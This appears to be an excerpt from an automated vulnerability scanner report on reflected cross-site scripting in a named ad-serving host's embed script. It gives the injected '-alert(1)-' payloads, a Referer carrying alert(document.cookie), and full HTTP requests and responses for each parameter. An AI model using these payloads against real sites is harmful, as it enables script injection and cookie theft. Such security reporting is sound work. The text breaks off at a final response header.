HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:49:06 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:49:06 GMT; path=/ Set-Cookie: i_1=33:1411:836:100:0:38345:1296398946:L|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2; expires=Tue, 01-Mar-2011 14:49:06 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 939
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!e9d3d'-alert(1)-'889a7271f4a&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a'; var iRM = new Image(); iRM.src = 'http://redcated/action/Scottrade_Remessaging'; return ...[SNIP]...
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f695'-alert(1)-'979cf30b28 was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balertdocument.cookie_@2F_@2F2badde9cef5?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=11105081375f695'-alert(1)-'979cf30b28&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:50:15 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:50:15 GMT; path=/ Set-Cookie: i_1=33:1411:782:100:0:38345:1296399015:L|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2; expires=Tue, 01-Mar-2011 14:50:15 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 938
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=11105081375f695'-alert(1)-'979cf30b28&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a'; var iRM = new Image(); iRM.src = 'http://redcated/action/Scottrade_Remessaging'; return true; } function wsod_image() { document.writ ...[SNIP]...
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 34465'-alert(1)-'c4dc97752cd was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balertdocument.cookie_@2F_@2F2badde9cef5?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a34465'-alert(1)-'c4dc97752cd HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:50:33 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:50:33 GMT; path=/ Set-Cookie: i_1=33:1411:46:100:0:38345:1296399033:L|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2; expires=Tue, 01-Mar-2011 14:50:33 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 935
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a34465'-alert(1)-'c4dc97752cd'; var iRM = new Image(); iRM.src = 'http://redcated/action/Scottrade_Remessaging'; return true; } function wsod_image() { document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7f ...[SNIP]...
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 767be'-alert(1)-'2fd933b06e7 was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balertdocument.cookie_@2F_@2F2badde9cef5?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD767be'-alert(1)-'2fd933b06e7&ASID=de8164d050b942d8a816e5fd11a9275a HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:50:24 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:50:24 GMT; path=/ Set-Cookie: i_1=33:1411:46:100:0:38345:1296399024:L|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2; expires=Tue, 01-Mar-2011 14:50:24 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 935
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD767be'-alert(1)-'2fd933b06e7&ASID=de8164d050b942d8a816e5fd11a9275a'; var iRM = new Image(); iRM.src = 'http://redcated/action/Scottrade_Remessaging'; return true; } function wsod_image() { document.write('<a href ...[SNIP]...
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e395'-alert(1)-'48483e8fdb0 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balertdocument.cookie_@2F_@2F2badde9cef5?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=82312089e395'-alert(1)-'48483e8fdb0&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:50:07 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:50:07 GMT; path=/ Set-Cookie: i_1=33:1411:49:100:0:38345:1296399007:L|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2; expires=Tue, 01-Mar-2011 14:50:07 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 941
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=82312089e395'-alert(1)-'48483e8fdb0&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a'; var iRM = new Image(); iRM.src = 'http://redcated/action/Scottrade_Remessaging'; return true; } function wsod_image() {
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62a7d'-alert(1)-'51e6f106d3a was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balertdocument.cookie_@2F_@2F2badde9cef5?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G62a7d'-alert(1)-'51e6f106d3a&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:49:52 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:49:52 GMT; path=/ Set-Cookie: i_1=33:1411:972:100:0:38345:1296398992:L|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2; expires=Tue, 01-Mar-2011 14:49:52 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 931
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G62a7d'-alert(1)-'51e6f106d3a&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a'; var iRM = new Image(); iRM.src = 'http://redcated/action/Scottrade_Remessaging'; return true; } function ...[SNIP]...
5.78. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426** [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d4b3'-alert(1)-'9d3d9a4f116 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balertdocument.cookie_@2F_@2F2badde9cef5?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a&9d4b3'-alert(1)-'9d3d9a4f116=1 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:51:23 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:51:23 GMT; path=/ Set-Cookie: i_1=33:1411:49:100:0:38345:1296399083:L|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2; expires=Tue, 01-Mar-2011 14:51:23 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 944
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a&9d4b3'-alert(1)-'9d3d9a4f116=1'; var iRM = new Image(); iRM.src = 'http://redcated/action/Scottrade_Remessaging'; return true; } function wsod_image() { document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d ...[SNIP]...
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d98da'-alert(1)-'8363eeee3cc was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balert1_@2F_@2F2badde9cef5?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235d98da'-alert(1)-'8363eeee3cc&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:49:20 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:49:20 GMT; path=/ Set-Cookie: i_1=33:1411:992:100:0:38345:1296398960:L|33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2; expires=Tue, 01-Mar-2011 14:49:20 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 913
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235d98da'-alert(1)-'8363eeee3cc&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980'; var iRM = new Image(); iRM.src = 'http://redcated/action/Scottrade_Remessaging'; return true; } fu ...[SNIP]...
The value of the 10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balert1_@2F_@2F2badde9cef5?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac4e4'-alert(1)-'5a9940a3aa6 was submitted in the 10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balert1_@2F_@2F2badde9cef5?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balert1_@2F_@2F2badde9cef5?click=http://g.redacted/_2AD0003L/97000000000044962.1?!ac4e4'-alert(1)-'5a9940a3aa6&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:49:06 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:49:06 GMT; path=/ Set-Cookie: i_1=33:1411:49:100:0:38345:1296398946:L|33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2; expires=Tue, 01-Mar-2011 14:49:06 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 927
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!ac4e4'-alert(1)-'5a9940a3aa6&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980'; var iRM = new Image(); iRM.src = 'http://redcated/action/Scottrade_Remessaging'; return ...[SNIP]...
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85db5'-alert(1)-'daab0c4241f was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balert1_@2F_@2F2badde9cef5?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=179898247385db5'-alert(1)-'daab0c4241f&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:50:23 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:50:23 GMT; path=/ Set-Cookie: i_1=33:1411:992:100:0:38345:1296399023:L|33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2; expires=Tue, 01-Mar-2011 14:50:23 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 913
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=179898247385db5'-alert(1)-'daab0c4241f&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980'; var iRM = new Image(); iRM.src = 'http://redcated/action/Scottrade_Remessaging'; return true; } function wsod_image() { document.writ ...[SNIP]...
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bdd79'-alert(1)-'0f43dad1fc1 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balert1_@2F_@2F2badde9cef5?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980bdd79'-alert(1)-'0f43dad1fc1 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2
Response
